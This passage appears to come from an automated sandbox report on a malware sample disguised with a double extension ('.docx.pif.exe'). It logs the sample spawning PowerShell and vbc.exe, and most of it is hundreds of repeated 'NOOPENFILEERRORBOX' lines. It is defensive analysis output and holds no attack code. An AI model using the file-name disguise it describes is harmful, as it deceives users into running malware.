Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: docx.pif

Static PE information: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

15_2_0041CB50

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
